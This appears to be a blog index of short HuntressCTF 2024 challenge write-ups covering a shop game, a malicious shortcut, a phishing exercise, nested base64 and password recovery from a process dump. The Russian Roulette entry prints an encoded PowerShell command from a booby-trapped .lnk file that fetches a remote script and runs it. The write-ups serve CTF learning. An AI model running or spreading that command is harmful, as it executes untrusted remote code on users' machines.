2024 HuntressCTF - Whamazon

2024-10-04

Summary

Author: @JohnHammond

Wham! Bam! Amazon is entering the hacking business! Can you buy a flag?

Steps

I started the docker instance and navigated to the challenge and was presented with this game. Selecting 1, I see there's nothing in my inventory. Going to the option to buy items, I see I can buy various items including a flag. However, the flag costs 1000000000, and I have 50 available to me.



2024 HuntressCTF - Russian Roulette

2024-10-03

Summary

Author: @JohnHammond

My PowerShell has been acting really weird!! It takes a few seconds to start up, and sometimes it just crashes my computer!?!?! :(

Steps

Downloaded the challenge file to my Windows VM's Downloads folder as russian_roulette.zip and unzipped it with the challenge password. Inside the .zip file was a powershell.lnk file. The target was a powershell command executing a base64 encoded string:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=

Decoding the base64 string I see the powershell.



2024 HuntressCTF - Red Phish Blue Phish

2024-10-02

Summary

Author: Truman Kain (@truman.huntress), Adam Rice (@adam.huntress)

You are to conduct a phishing exercise against our client, Pyrch Data. We've identified the Marketing Director, Sarah Williams (swilliams@pyrchdata.com), as a user susceptible to phishing. Are you able to successfully phish her? Remember your OSINT ;)

NOTE: The port that becomes accessible upon challenge deployment is an SMTP server. Please use this for sending any phishing emails. You will not receive an email/human response as the mail infrastructure for this challenge is emulated.



2024 HuntressCTF - Base64by32

2024-10-01

Summary

Author: @JohnHammond

This is a dumb challenge. I'm sorry.

Steps

I downloaded the challenge file to Kali and quickly noticed the text is most likely encoded with base64:

Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVmpBeFYySkVU bGhoTVVwVVZtcEJlRll5U2tWVQpiR2hvVFZWd1ZWWnRjRUpsUmxsNVUydFdWUXBpUjJodlZGWldk MVpXV25SalJVcHNVbXhzTlZVeWRGZFdVWEJwVWpKb2RsWkdXbGRrCk1WcFhWMjVTYWxKVmNITlZi WGh6VGxaVmVXUkdaRmRWV0VKd1ZXcEtiMlJzV2tkWGJHUnJDazFXY0ZoV01qVlRZV3hLVm1OSVRs WmkKV0doNlZHeGFWbVZYVWtkYVJtUldWMFZLZDFaWGNFdGlNbEp6VjJ0a1dHSkhVbkpEYXpGWFkw Wm9WMDFxVmxSWlYzaExWbTFPU1ZScwpXbWtLVjBkb05sWkhlR0ZXYlZaWVZXdGtZVkp0VWxkV01G ....

Using cat base64by32 | base64 -d I see another base64 result. Next I executed cat base64by32 | base64 -d | wc -l and see a result of 6310. Doing that again, by running cat base64by32 | base64 -d | base64 -d | wc -l, the result continues to get smaller.



2024 HuntressCTF - Mimi

2024-10-01

Summary

Author: @JohnHammond

Uh oh! Mimi forgot her password for her Windows laptop! Luckily, she dumped one of the crucial processes running on her computer (don't ask me why, okay)... can you help her recover her password?

NOTE: This file on its own is not malware per se, but it is likely to raise antivirus alerts. Would recommend examining this inside of a virtual environment.

Steps

I downloaded the file and extracted it on my Linux system.
